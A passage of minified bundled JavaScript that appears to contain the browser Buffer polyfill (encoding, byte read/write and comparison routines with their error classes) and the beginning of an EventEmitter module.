v(this,We,Je);case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return R(this,We,Je);default:if(Oe)throw new TypeError("Unknown encoding: "+xe);xe=(xe+"").toLowerCase(),Oe=!0}}function se(xe,We,Je){const Oe=xe[We];xe[We]=xe[Je],xe[Je]=Oe}function ve(xe,We,Je,Oe,Te){if(0===xe.length)return-1;if("string"==typeof Je?(Oe=Je,Je=0):Je>2147483647?Je=2147483647:Je<-2147483648&&(Je=-2147483648),ht(Je=+Je)&&(Je=Te?0:xe.length-1),Je<0&&(Je=xe.length+Je),Je>=xe.length){if(Te)return-1;Je=xe.length-1}else if(Je<0){if(!Te)return-1;Je=0}if("string"==typeof We&&(We=p.from(We,Oe)),p.isBuffer(We))return 0===We.length?-1:le(xe,We,Je,Oe,Te);if("number"==typeof We)return We&=255,"function"==typeof Uint8Array.prototype.indexOf?Te?Uint8Array.prototype.indexOf.call(xe,We,Je):Uint8Array.prototype.lastIndexOf.call(xe,We,Je):le(xe,[We],Je,Oe,Te);throw new TypeError("val must be string, number or Buffer")}function le(xe,We,Je,Oe,Te){let Le,$e=1,st=xe.length,xt=We.length;if(void 0!==Oe&&("ucs2"===(Oe=String(Oe).toLowerCase())||"ucs-2"===Oe||"utf16le"===Oe||"utf-16le"===Oe)){if(xe.length<2||We.length<2)return-1;$e=2,st/=2,xt/=2,Je/=2}function pt(vt,Wi){return 1===$e?vt[Wi]:vt.readUInt16BE(Wi*$e)}if(Te){let vt=-1;for(Le=Je;Le<st;Le++)if(pt(xe,Le)===pt(We,-1===vt?0:Le-vt)){if(-1===vt&&(vt=Le),Le-vt+1===xt)return vt*$e}else-1!==vt&&(Le-=Le-vt),vt=-1}else for(Je+xt>st&&(Je=st-xt),Le=Je;Le>=0;Le--){let vt=!0;for(let Wi=0;Wi<xt;Wi++)if(pt(xe,Le+Wi)!==pt(We,Wi)){vt=!1;break}if(vt)return Le}return-1}function ye(xe,We,Je,Oe){Je=Number(Je)||0;const Te=xe.length-Je;Oe?(Oe=Number(Oe))>Te&&(Oe=Te):Oe=Te;const Le=We.length;let $e;for(Oe>Le/2&&(Oe=Le/2),$e=0;$e<Oe;++$e){const st=parseInt(We.substr(2*$e,2),16);if(ht(st))return $e;xe[Je+$e]=st}return $e}function z(xe,We,Je,Oe){return Ge(Ke(We,xe.length-Je),xe,Je,Oe)}function l(xe,We,Je,Oe){return Ge(function(Te){const Le=[];for(let $e=0;$e<Te.length;++$e)Le.push(255&Te.charCodeAt($e));return Le}(We),xe,Je,Oe)}function f(xe,We,Je,Oe){return Ge(rt(We),xe,Je,Oe)}function A(xe,We,Je,Oe){return Ge(function(Te,Le){let $e,st,xt;const pt=[];for(let vt=0;vt<Te.length&&!((Le-=2)<0);++vt)$e=Te.charCodeAt(vt),st=$e>>8,xt=$e%256,pt.push(xt),pt.push(st);return pt}(We,xe.length-Je),xe,Je,Oe)}function v(xe,We,Je){return g.fromByteArray(0===We&&Je===xe.length?xe:xe.slice(We,Je))}function P(xe,We,Je){Je=Math.min(xe.length,Je);const Oe=[];let Te=We;for(;Te<Je;){const Le=xe[Te];let $e=null,st=Le>239?4:Le>223?3:Le>191?2:1;if(Te+st<=Je){let xt,pt,vt,Wi;switch(st){case 1:Le<128&&($e=Le);break;case 2:xt=xe[Te+1],128==(192&xt)&&(Wi=(31&Le)<<6|63&xt,Wi>127&&($e=Wi));break;case 3:xt=xe[Te+1],pt=xe[Te+2],128==(192&xt)&&128==(192&pt)&&(Wi=(15&Le)<<12|(63&xt)<<6|63&pt,Wi>2047&&(Wi<55296||Wi>57343)&&($e=Wi));break;case 4:xt=xe[Te+1],pt=xe[Te+2],vt=xe[Te+3],128==(192&xt)&&128==(192&pt)&&128==(192&vt)&&(Wi=(15&Le)<<18|(63&xt)<<12|(63&pt)<<6|63&vt,Wi>65535&&Wi<1114112&&($e=Wi))}}null===$e?($e=65533,st=1):$e>65535&&($e-=65536,Oe.push($e>>>10&1023|55296),$e=56320|1023&$e),Oe.push($e),Te+=st}return function(Le){const $e=Le.length;if($e<=G)return String.fromCharCode.apply(String,Le);let st="",xt=0;for(;xt<$e;)st+=String.fromCharCode.apply(String,Le.slice(xt,xt+=G));return st}(Oe)}F.kMaxLength=y,(p.TYPED_ARRAY_SUPPORT=function(){try{const xe=new Uint8Array(1),We={foo:function(){return 42}};return Object.setPrototypeOf(We,Uint8Array.prototype),Object.setPrototypeOf(xe,We),42===xe.foo()}catch(xe){return!1}}())||"undefined"==typeof console||"function"!=typeof console.error||console.error("This browser lacks typed array (Uint8Array) support which is required by `buffer` v5.x. Use `buffer` v4.x if you require old browser support."),Object.defineProperty(p.prototype,"parent",{enumerable:!0,get:function(){if(p.isBuffer(this))return this.buffer}}),Object.defineProperty(p.prototype,"offset",{enumerable:!0,get:function(){if(p.isBuffer(this))return this.byteOffset}}),p.poolSize=8192,p.from=function(xe,We,Je){return D(xe,We,Je)},Object.setPrototypeOf(p.prototype,Uint8Array.prototype),Object.setPrototypeOf(p,Uint8Array),p.alloc=function(xe,We,Je){return Te=We,Le=Je,w(Oe=xe),Oe<=0?M(Oe):void 0!==Te?"string"==typeof Le?M(Oe).fill(Te,Le):M(Oe).fill(Te):M(Oe);var Oe,Te,Le},p.allocUnsafe=function(xe){return x(xe)},p.allocUnsafeSlow=function(xe){return x(xe)},p.isBuffer=function(xe){return null!=xe&&!0===xe._isBuffer&&xe!==p.prototype},p.compare=function(xe,We){if(Qe(xe,Uint8Array)&&(xe=p.from(xe,xe.offset,xe.byteLength)),Qe(We,Uint8Array)&&(We=p.from(We,We.offset,We.byteLength)),!p.isBuffer(xe)||!p.isBuffer(We))throw new TypeError('The "buf1", "buf2" arguments must be one of type Buffer or Uint8Array');if(xe===We)return 0;let Je=xe.length,Oe=We.length;for(let Te=0,Le=Math.min(Je,Oe);Te<Le;++Te)if(xe[Te]!==We[Te]){Je=xe[Te],Oe=We[Te];break}return Je<Oe?-1:Oe<Je?1:0},p.isEncoding=function(xe){switch(String(xe).toLowerCase()){case"hex":case"utf8":case"utf-8":case"ascii":case"latin1":case"binary":case"base64":case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return!0;default:return!1}},p.concat=function(xe,We){if(!Array.isArray(xe))throw new TypeError('"list" argument must be an Array of Buffers');if(0===xe.length)return p.alloc(0);let Je;if(void 0===We)for(We=0,Je=0;Je<xe.length;++Je)We+=xe[Je].length;const Oe=p.allocUnsafe(We);let Te=0;for(Je=0;Je<xe.length;++Je){let Le=xe[Je];if(Qe(Le,Uint8Array))Te+Le.length>Oe.length?(p.isBuffer(Le)||(Le=p.from(Le)),Le.copy(Oe,Te)):Uint8Array.prototype.set.call(Oe,Le,Te);else{if(!p.isBuffer(Le))throw new TypeError('"list" argument must be an Array of Buffers');Le.copy(Oe,Te)}Te+=Le.length}return Oe},p.byteLength=K,p.prototype._isBuffer=!0,p.prototype.swap16=function(){const xe=this.length;if(xe%2!=0)throw new RangeError("Buffer size must be a multiple of 16-bits");for(let We=0;We<xe;We+=2)se(this,We,We+1);return this},p.prototype.swap32=function(){const xe=this.length;if(xe%4!=0)throw new RangeError("Buffer size must be a multiple of 32-bits");for(let We=0;We<xe;We+=4)se(this,We,We+3),se(this,We+1,We+2);return this},p.prototype.swap64=function(){const xe=this.length;if(xe%8!=0)throw new RangeError("Buffer size must be a multiple of 64-bits");for(let We=0;We<xe;We+=8)se(this,We,We+7),se(this,We+1,We+6),se(this,We+2,We+5),se(this,We+3,We+4);return this},p.prototype.toLocaleString=p.prototype.toString=function(){const xe=this.length;return 0===xe?"":0===arguments.length?P(this,0,xe):ee.apply(this,arguments)},p.prototype.equals=function(xe){if(!p.isBuffer(xe))throw new TypeError("Argument must be a Buffer");return this===xe||0===p.compare(this,xe)},p.prototype.inspect=function(){let xe="";const We=F.INSPECT_MAX_BYTES;return xe=this.toString("hex",0,We).replace(/(.{2})/g,"$1 ").trim(),this.length>We&&(xe+=" ... "),"<Buffer "+xe+">"},_&&(p.prototype[_]=p.prototype.inspect),p.prototype.compare=function(xe,We,Je,Oe,Te){if(Qe(xe,Uint8Array)&&(xe=p.from(xe,xe.offset,xe.byteLength)),!p.isBuffer(xe))throw new TypeError('The "target" argument must be one of type Buffer or Uint8Array. Received type '+typeof xe);if(void 0===We&&(We=0),void 0===Je&&(Je=xe?xe.length:0),void 0===Oe&&(Oe=0),void 0===Te&&(Te=this.length),We<0||Je>xe.length||Oe<0||Te>this.length)throw new RangeError("out of range index");if(Oe>=Te&&We>=Je)return 0;if(Oe>=Te)return-1;if(We>=Je)return 1;if(this===xe)return 0;let Le=(Te>>>=0)-(Oe>>>=0),$e=(Je>>>=0)-(We>>>=0);const st=Math.min(Le,$e),xt=this.slice(Oe,Te),pt=xe.slice(We,Je);for(let vt=0;vt<st;++vt)if(xt[vt]!==pt[vt]){Le=xt[vt],$e=pt[vt];break}return Le<$e?-1:$e<Le?1:0},p.prototype.includes=function(xe,We,Je){return-1!==this.indexOf(xe,We,Je)},p.prototype.indexOf=function(xe,We,Je){return ve(this,xe,We,Je,!0)},p.prototype.lastIndexOf=function(xe,We,Je){return ve(this,xe,We,Je,!1)},p.prototype.write=function(xe,We,Je,Oe){if(void 0===We)Oe="utf8",Je=this.length,We=0;else if(void 0===Je&&"string"==typeof We)Oe=We,Je=this.length,We=0;else{if(!isFinite(We))throw new Error("Buffer.write(string, encoding, offset[, length]) is no longer supported");We>>>=0,isFinite(Je)?(Je>>>=0,void 0===Oe&&(Oe="utf8")):(Oe=Je,Je=void 0)}const Te=this.length-We;if((void 0===Je||Je>Te)&&(Je=Te),xe.length>0&&(Je<0||We<0)||We>this.length)throw new RangeError("Attempt to write outside buffer bounds");Oe||(Oe="utf8");let Le=!1;for(;;)switch(Oe){case"hex":return ye(this,xe,We,Je);case"utf8":case"utf-8":return z(this,xe,We,Je);case"ascii":case"latin1":case"binary":return l(this,xe,We,Je);case"base64":return f(this,xe,We,Je);case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return A(this,xe,We,Je);default:if(Le)throw new TypeError("Unknown encoding: "+Oe);Oe=(""+Oe).toLowerCase(),Le=!0}},p.prototype.toJSON=function(){return{type:"Buffer",data:Array.prototype.slice.call(this._arr||this,0)}};const G=4096;function X(xe,We,Je){let Oe="";Je=Math.min(xe.length,Je);for(let Te=We;Te<Je;++Te)Oe+=String.fromCharCode(127&xe[Te]);return Oe}function L(xe,We,Je){let Oe="";Je=Math.min(xe.length,Je);for(let Te=We;Te<Je;++Te)Oe+=String.fromCharCode(xe[Te]);return Oe}function h(xe,We,Je){const Oe=xe.length;(!We||We<0)&&(We=0),(!Je||Je<0||Je>Oe)&&(Je=Oe);let Te="";for(let Le=We;Le<Je;++Le)Te+=mt[xe[Le]];return Te}function R(xe,We,Je){const Oe=xe.slice(We,Je);let Te="";for(let Le=0;Le<Oe.length-1;Le+=2)Te+=String.fromCharCode(Oe[Le]+256*Oe[Le+1]);return Te}function J(xe,We,Je){if(xe%1!=0||xe<0)throw new RangeError("offset is not uint");if(xe+We>Je)throw new RangeError("Trying to access beyond buffer length")}function Z(xe,We,Je,Oe,Te,Le){if(!p.isBuffer(xe))throw new TypeError('"buffer" argument must be a Buffer instance');if(We>Te||We<Le)throw new RangeError('"value" argument is out of bounds');if(Je+Oe>xe.length)throw new RangeError("Index out of range")}function ue(xe,We,Je,Oe,Te){De(We,Oe,Te,xe,Je,7);let Le=Number(We&BigInt(4294967295));xe[Je++]=Le,Le>>=8,xe[Je++]=Le,Le>>=8,xe[Je++]=Le,Le>>=8,xe[Je++]=Le;let $e=Number(We>>BigInt(32)&BigInt(4294967295));return xe[Je++]=$e,$e>>=8,xe[Je++]=$e,$e>>=8,xe[Je++]=$e,$e>>=8,xe[Je++]=$e,Je}function Ie(xe,We,Je,Oe,Te){De(We,Oe,Te,xe,Je,7);let Le=Number(We&BigInt(4294967295));xe[Je+7]=Le,Le>>=8,xe[Je+6]=Le,Le>>=8,xe[Je+5]=Le,Le>>=8,xe[Je+4]=Le;let $e=Number(We>>BigInt(32)&BigInt(4294967295));return xe[Je+3]=$e,$e>>=8,xe[Je+2]=$e,$e>>=8,xe[Je+1]=$e,$e>>=8,xe[Je]=$e,Je+8}function Ae(xe,We,Je,Oe,Te,Le){if(Je+Oe>xe.length)throw new RangeError("Index out of range");if(Je<0)throw new RangeError("Index out of range")}function Ue(xe,We,Je,Oe,Te){return We=+We,Je>>>=0,Te||Ae(xe,0,Je,4),b.write(xe,We,Je,Oe,23,4),Je+4}function Xe(xe,We,Je,Oe,Te){return We=+We,Je>>>=0,Te||Ae(xe,0,Je,8),b.write(xe,We,Je,Oe,52,8),Je+8}p.prototype.slice=function(xe,We){const Je=this.length;(xe=~~xe)<0?(xe+=Je)<0&&(xe=0):xe>Je&&(xe=Je),(We=void 0===We?Je:~~We)<0?(We+=Je)<0&&(We=0):We>Je&&(We=Je),We<xe&&(We=xe);const Oe=this.subarray(xe,We);return Object.setPrototypeOf(Oe,p.prototype),Oe},p.prototype.readUintLE=p.prototype.readUIntLE=function(xe,We,Je){xe>>>=0,We>>>=0,Je||J(xe,We,this.length);let Oe=this[xe],Te=1,Le=0;for(;++Le<We&&(Te*=256);)Oe+=this[xe+Le]*Te;return Oe},p.prototype.readUintBE=p.prototype.readUIntBE=function(xe,We,Je){xe>>>=0,We>>>=0,Je||J(xe,We,this.length);let Oe=this[xe+--We],Te=1;for(;We>0&&(Te*=256);)Oe+=this[xe+--We]*Te;return Oe},p.prototype.readUint8=p.prototype.readUInt8=function(xe,We){return xe>>>=0,We||J(xe,1,this.length),this[xe]},p.prototype.readUint16LE=p.prototype.readUInt16LE=function(xe,We){return xe>>>=0,We||J(xe,2,this.length),this[xe]|this[xe+1]<<8},p.prototype.readUint16BE=p.prototype.readUInt16BE=function(xe,We){return xe>>>=0,We||J(xe,2,this.length),this[xe]<<8|this[xe+1]},p.prototype.readUint32LE=p.prototype.readUInt32LE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),(this[xe]|this[xe+1]<<8|this[xe+2]<<16)+16777216*this[xe+3]},p.prototype.readUint32BE=p.prototype.readUInt32BE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),16777216*this[xe]+(this[xe+1]<<16|this[xe+2]<<8|this[xe+3])},p.prototype.readBigUInt64LE=lt(function(xe){Ve(xe>>>=0,"offset");const We=this[xe],Je=this[xe+7];void 0!==We&&void 0!==Je||ze(xe,this.length-8);const Oe=We+256*this[++xe]+65536*this[++xe]+this[++xe]*Lo(2,24),Te=this[++xe]+256*this[++xe]+65536*this[++xe]+Je*Lo(2,24);return BigInt(Oe)+(BigInt(Te)<<BigInt(32))}),p.prototype.readBigUInt64BE=lt(function(xe){Ve(xe>>>=0,"offset");const We=this[xe],Je=this[xe+7];void 0!==We&&void 0!==Je||ze(xe,this.length-8);const Oe=We*Lo(2,24)+65536*this[++xe]+256*this[++xe]+this[++xe],Te=this[++xe]*Lo(2,24)+65536*this[++xe]+256*this[++xe]+Je;return(BigInt(Oe)<<BigInt(32))+BigInt(Te)}),p.prototype.readIntLE=function(xe,We,Je){xe>>>=0,We>>>=0,Je||J(xe,We,this.length);let Oe=this[xe],Te=1,Le=0;for(;++Le<We&&(Te*=256);)Oe+=this[xe+Le]*Te;return Te*=128,Oe>=Te&&(Oe-=Math.pow(2,8*We)),Oe},p.prototype.readIntBE=function(xe,We,Je){xe>>>=0,We>>>=0,Je||J(xe,We,this.length);let Oe=We,Te=1,Le=this[xe+--Oe];for(;Oe>0&&(Te*=256);)Le+=this[xe+--Oe]*Te;return Te*=128,Le>=Te&&(Le-=Math.pow(2,8*We)),Le},p.prototype.readInt8=function(xe,We){return xe>>>=0,We||J(xe,1,this.length),128&this[xe]?-1*(255-this[xe]+1):this[xe]},p.prototype.readInt16LE=function(xe,We){xe>>>=0,We||J(xe,2,this.length);const Je=this[xe]|this[xe+1]<<8;return 32768&Je?4294901760|Je:Je},p.prototype.readInt16BE=function(xe,We){xe>>>=0,We||J(xe,2,this.length);const Je=this[xe+1]|this[xe]<<8;return 32768&Je?4294901760|Je:Je},p.prototype.readInt32LE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),this[xe]|this[xe+1]<<8|this[xe+2]<<16|this[xe+3]<<24},p.prototype.readInt32BE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),this[xe]<<24|this[xe+1]<<16|this[xe+2]<<8|this[xe+3]},p.prototype.readBigInt64LE=lt(function(xe){Ve(xe>>>=0,"offset");const We=this[xe],Je=this[xe+7];return void 0!==We&&void 0!==Je||ze(xe,this.length-8),(BigInt(this[xe+4]+256*this[xe+5]+65536*this[xe+6]+(Je<<24))<<BigInt(32))+BigInt(We+256*this[++xe]+65536*this[++xe]+16777216*this[++xe])}),p.prototype.readBigInt64BE=lt(function(xe){Ve(xe>>>=0,"offset");const We=this[xe],Je=this[xe+7];void 0!==We&&void 0!==Je||ze(xe,this.length-8);const Oe=(We<<24)+65536*this[++xe]+256*this[++xe]+this[++xe];return(BigInt(Oe)<<BigInt(32))+BigInt(16777216*this[++xe]+65536*this[++xe]+256*this[++xe]+Je)}),p.prototype.readFloatLE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),b.read(this,xe,!0,23,4)},p.prototype.readFloatBE=function(xe,We){return xe>>>=0,We||J(xe,4,this.length),b.read(this,xe,!1,23,4)},p.prototype.readDoubleLE=function(xe,We){return xe>>>=0,We||J(xe,8,this.length),b.read(this,xe,!0,52,8)},p.prototype.readDoubleBE=function(xe,We){return xe>>>=0,We||J(xe,8,this.length),b.read(this,xe,!1,52,8)},p.prototype.writeUintLE=p.prototype.writeUIntLE=function(xe,We,Je,Oe){xe=+xe,We>>>=0,Je>>>=0,Oe||Z(this,xe,We,Je,Math.pow(2,8*Je)-1,0);let Te=1,Le=0;for(this[We]=255&xe;++Le<Je&&(Te*=256);)this[We+Le]=xe/Te&255;return We+Je},p.prototype.writeUintBE=p.prototype.writeUIntBE=function(xe,We,Je,Oe){xe=+xe,We>>>=0,Je>>>=0,Oe||Z(this,xe,We,Je,Math.pow(2,8*Je)-1,0);let Te=Je-1,Le=1;for(this[We+Te]=255&xe;--Te>=0&&(Le*=256);)this[We+Te]=xe/Le&255;return We+Je},p.prototype.writeUint8=p.prototype.writeUInt8=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,1,255,0),this[We]=255&xe,We+1},p.prototype.writeUint16LE=p.prototype.writeUInt16LE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,2,65535,0),this[We]=255&xe,this[We+1]=xe>>>8,We+2},p.prototype.writeUint16BE=p.prototype.writeUInt16BE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,2,65535,0),this[We]=xe>>>8,this[We+1]=255&xe,We+2},p.prototype.writeUint32LE=p.prototype.writeUInt32LE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,4,4294967295,0),this[We+3]=xe>>>24,this[We+2]=xe>>>16,this[We+1]=xe>>>8,this[We]=255&xe,We+4},p.prototype.writeUint32BE=p.prototype.writeUInt32BE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,4,4294967295,0),this[We]=xe>>>24,this[We+1]=xe>>>16,this[We+2]=xe>>>8,this[We+3]=255&xe,We+4},p.prototype.writeBigUInt64LE=lt(function(xe,We=0){return ue(this,xe,We,BigInt(0),BigInt("0xffffffffffffffff"))}),p.prototype.writeBigUInt64BE=lt(function(xe,We=0){return Ie(this,xe,We,BigInt(0),BigInt("0xffffffffffffffff"))}),p.prototype.writeIntLE=function(xe,We,Je,Oe){if(xe=+xe,We>>>=0,!Oe){const st=Math.pow(2,8*Je-1);Z(this,xe,We,Je,st-1,-st)}let Te=0,Le=1,$e=0;for(this[We]=255&xe;++Te<Je&&(Le*=256);)xe<0&&0===$e&&0!==this[We+Te-1]&&($e=1),this[We+Te]=(xe/Le>>0)-$e&255;return We+Je},p.prototype.writeIntBE=function(xe,We,Je,Oe){if(xe=+xe,We>>>=0,!Oe){const st=Math.pow(2,8*Je-1);Z(this,xe,We,Je,st-1,-st)}let Te=Je-1,Le=1,$e=0;for(this[We+Te]=255&xe;--Te>=0&&(Le*=256);)xe<0&&0===$e&&0!==this[We+Te+1]&&($e=1),this[We+Te]=(xe/Le>>0)-$e&255;return We+Je},p.prototype.writeInt8=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,1,127,-128),xe<0&&(xe=255+xe+1),this[We]=255&xe,We+1},p.prototype.writeInt16LE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,2,32767,-32768),this[We]=255&xe,this[We+1]=xe>>>8,We+2},p.prototype.writeInt16BE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,2,32767,-32768),this[We]=xe>>>8,this[We+1]=255&xe,We+2},p.prototype.writeInt32LE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,4,2147483647,-2147483648),this[We]=255&xe,this[We+1]=xe>>>8,this[We+2]=xe>>>16,this[We+3]=xe>>>24,We+4},p.prototype.writeInt32BE=function(xe,We,Je){return xe=+xe,We>>>=0,Je||Z(this,xe,We,4,2147483647,-2147483648),xe<0&&(xe=4294967295+xe+1),this[We]=xe>>>24,this[We+1]=xe>>>16,this[We+2]=xe>>>8,this[We+3]=255&xe,We+4},p.prototype.writeBigInt64LE=lt(function(xe,We=0){return ue(this,xe,We,-BigInt("0x8000000000000000"),BigInt("0x7fffffffffffffff"))}),p.prototype.writeBigInt64BE=lt(function(xe,We=0){return Ie(this,xe,We,-BigInt("0x8000000000000000"),BigInt("0x7fffffffffffffff"))}),p.prototype.writeFloatLE=function(xe,We,Je){return Ue(this,xe,We,!0,Je)},p.prototype.writeFloatBE=function(xe,We,Je){return Ue(this,xe,We,!1,Je)},p.prototype.writeDoubleLE=function(xe,We,Je){return Xe(this,xe,We,!0,Je)},p.prototype.writeDoubleBE=function(xe,We,Je){return Xe(this,xe,We,!1,Je)},p.prototype.copy=function(xe,We,Je,Oe){if(!p.isBuffer(xe))throw new TypeError("argument should be a Buffer");if(Je||(Je=0),Oe||0===Oe||(Oe=this.length),We>=xe.length&&(We=xe.length),We||(We=0),Oe>0&&Oe<Je&&(Oe=Je),Oe===Je||0===xe.length||0===this.length)return 0;if(We<0)throw new RangeError("targetStart out of bounds");if(Je<0||Je>=this.length)throw new RangeError("Index out of range");if(Oe<0)throw new RangeError("sourceEnd out of bounds");Oe>this.length&&(Oe=this.length),xe.length-We<Oe-Je&&(Oe=xe.length-We+Je);const Te=Oe-Je;return this===xe&&"function"==typeof Uint8Array.prototype.copyWithin?this.copyWithin(We,Je,Oe):Uint8Array.prototype.set.call(xe,this.subarray(Je,Oe),We),Te},p.prototype.fill=function(xe,We,Je,Oe){if("string"==typeof xe){if("string"==typeof We?(Oe=We,We=0,Je=this.length):"string"==typeof Je&&(Oe=Je,Je=this.length),void 0!==Oe&&"string"!=typeof Oe)throw new TypeError("encoding must be a string");if("string"==typeof Oe&&!p.isEncoding(Oe))throw new TypeError("Unknown encoding: "+Oe);if(1===xe.length){const Le=xe.charCodeAt(0);("utf8"===Oe&&Le<128||"latin1"===Oe)&&(xe=Le)}}else"number"==typeof xe?xe&=255:"boolean"==typeof xe&&(xe=Number(xe));if(We<0||this.length<We||this.length<Je)throw new RangeError("Out of range index");if(Je<=We)return this;let Te;if(We>>>=0,Je=void 0===Je?this.length:Je>>>0,xe||(xe=0),"number"==typeof xe)for(Te=We;Te<Je;++Te)this[Te]=xe;else{const Le=p.isBuffer(xe)?xe:p.from(xe,Oe),$e=Le.length;if(0===$e)throw new TypeError('The value "'+xe+'" is invalid for argument "value"');for(Te=0;Te<Je-We;++Te)this[Te+We]=Le[Te%$e]}return this};const He={};function Be(xe,We,Je){He[xe]=class extends Je{constructor(){super(),Object.defineProperty(this,"message",{value:We.apply(this,arguments),writable:!0,configurable:!0}),this.name=`${this.name} [${xe}]`,delete this.name}get code(){return xe}set code(Oe){Object.defineProperty(this,"code",{configurable:!0,enumerable:!0,value:Oe,writable:!0})}toString(){return`${this.name} [${xe}]: ${this.message}`}}}function qe(xe){let We="",Je=xe.length;const Oe="-"===xe[0]?1:0;for(;Je>=Oe+4;Je-=3)We=`_${xe.slice(Je-3,Je)}${We}`;return`${xe.slice(0,Je)}${We}`}function De(xe,We,Je,Oe,Te,Le){if(xe>Je||xe<We){const $e="bigint"==typeof We?"n":"";let st;throw st=Le>3?0===We||We===BigInt(0)?`>= 0${$e} and < 2${$e} ** ${8*(Le+1)}${$e}`:`>= -(2${$e} ** ${8*(Le+1)-1}${$e}) and < 2 ** ${8*(Le+1)-1}${$e}`:`>= ${We}${$e} and <= ${Je}${$e}`,new He.ERR_OUT_OF_RANGE("value",st,xe)}var $e,st,xt;$e=Oe,xt=Le,Ve(st=Te,"offset"),void 0!==$e[st]&&void 0!==$e[st+xt]||ze(st,$e.length-(xt+1))}function Ve(xe,We){if("number"!=typeof xe)throw new He.ERR_INVALID_ARG_TYPE(We,"number",xe)}function ze(xe,We,Je){throw Math.floor(xe)!==xe?(Ve(xe,Je),new He.ERR_OUT_OF_RANGE(Je||"offset","an integer",xe)):We<0?new He.ERR_BUFFER_OUT_OF_BOUNDS:new He.ERR_OUT_OF_RANGE(Je||"offset",`>= ${Je?1:0} and <= ${We}`,xe)}Be("ERR_BUFFER_OUT_OF_BOUNDS",function(xe){return xe?`${xe} is outside of buffer bounds`:"Attempt to access memory outside buffer bounds"},RangeError),Be("ERR_INVALID_ARG_TYPE",function(xe,We){return`The "${xe}" argument must be of type number. Received type ${typeof We}`},TypeError),Be("ERR_OUT_OF_RANGE",function(xe,We,Je){let Oe=`The value of "${xe}" is out of range.`,Te=Je;return Number.isInteger(Je)&&Math.abs(Je)>4294967296?Te=qe(String(Je)):"bigint"==typeof Je&&(Te=String(Je),(Je>Lo(BigInt(2),BigInt(32))||Je<-Lo(BigInt(2),BigInt(32)))&&(Te=qe(Te)),Te+="n"),Oe+=` It must be ${We}. Received ${Te}`,Oe},RangeError);const me=/[^+/0-9A-Za-z-_]/g;function Ke(xe,We){let Je;We=We||1/0;const Oe=xe.length;let Te=null;const Le=[];for(let $e=0;$e<Oe;++$e){if(Je=xe.charCodeAt($e),Je>55295&&Je<57344){if(!Te){if(Je>56319){(We-=3)>-1&&Le.push(239,191,189);continue}if($e+1===Oe){(We-=3)>-1&&Le.push(239,191,189);continue}Te=Je;continue}if(Je<56320){(We-=3)>-1&&Le.push(239,191,189),Te=Je;continue}Je=65536+(Te-55296<<10|Je-56320)}else Te&&(We-=3)>-1&&Le.push(239,191,189);if(Te=null,Je<128){if((We-=1)<0)break;Le.push(Je)}else if(Je<2048){if((We-=2)<0)break;Le.push(Je>>6|192,63&Je|128)}else if(Je<65536){if((We-=3)<0)break;Le.push(Je>>12|224,Je>>6&63|128,63&Je|128)}else{if(!(Je<1114112))throw new Error("Invalid code point");if((We-=4)<0)break;Le.push(Je>>18|240,Je>>12&63|128,Je>>6&63|128,63&Je|128)}}return Le}function rt(xe){return g.toByteArray(function(We){if((We=(We=We.split("=")[0]).trim().replace(me,"")).length<2)return"";for(;We.length%4!=0;)We+="=";return We}(xe))}function Ge(xe,We,Je,Oe){let Te;for(Te=0;Te<Oe&&!(Te+Je>=We.length||Te>=xe.length);++Te)We[Te+Je]=xe[Te];return Te}function Qe(xe,We){return xe instanceof We||null!=xe&&null!=xe.constructor&&null!=xe.constructor.name&&xe.constructor.name===We.name}function ht(xe){return xe!=xe}const mt=function(){const xe="0123456789abcdef",We=new Array(256);for(let Je=0;Je<16;++Je){const Oe=16*Je;for(let Te=0;Te<16;++Te)We[Oe+Te]=xe[Je]+xe[Te]}return We}();function lt(xe){return"undefined"==typeof BigInt?ft:xe}function ft(){throw new Error("BigInt not supported")}},7187:Q=>{"use strict";var F,E="object"==typeof Reflect?Reflect:null,g=E&&"function"==typeof E.apply?E.apply:function(ee,se,ve){return Function.prototype.apply.call(ee,se,ve)};F=E&&"function"==typeof E.ownKeys?E.ownKeys:Object.getOwnPropertySymbols?function(ee){return Object.getOwnPropertyNames(ee).concat(Object.getOwnPropertySymbols(ee))}:function(ee){return Object.getOwnPropertyNames(ee)};var b=Number.isNaN||function(ee){return ee!=ee};function _(){_.init.call(this)}Q.exports=_,Q.exports.once=function(ee,se){return new Promise(function(ve,le){function ye(l){ee.removeListener(se,z),le(l)}function z(){"function"==typeof ee.removeListener&&ee.removeListener("error",ye),ve([].slice.call(arguments))}var l;K(ee,se,z,{once:!0}),"error"!==se&&("function"==typeof(l=ee).on&&K(l,"error",ye,{once:!0}))})},_.EventEmitter=_,_.prototype._events=void 0,_.prototype._eventsCount=0,_.prototype._maxListeners=void 0;var y=10;function M(ee){if("function"!=typeof ee)throw new TypeError('The "listener" argument must be of type Function. Received type '+typeof ee)}function p(ee){return void 0===ee._maxListeners?_.defaultMaxListeners:ee._maxListeners}function D(ee,se,ve,le){var ye,z,l;if(M(ve),void 0===(z=ee._events)?(z=ee._events=Object.create(null),ee._eventsCount=0):(void 0!==z.newListener&&(ee.emit("newListener",se,ve.listener?ve.listener:ve),z=ee._events),l=z[se]),void 0===l)l=z[se]=ve,++ee._eventsCount;else if("function"==typeof l?l=z[se]=le?[ve,l]:[l,ve]:le?l.unshift(ve):l.push(ve),(ye=p(ee))>0&&l.length>ye&&!l.warned){l.warned=!0;var A=new Error("Possible EventEmitter memory leak detected. "+l.length+" "+String(se)+" listeners added. Use emitter.setMaxListeners() to increase limit");A.name="MaxListenersExceededWarning",A.emitter=ee,A.type=se,A.count=l.length,console&&console.warn&&console.warn(A)}return ee}function 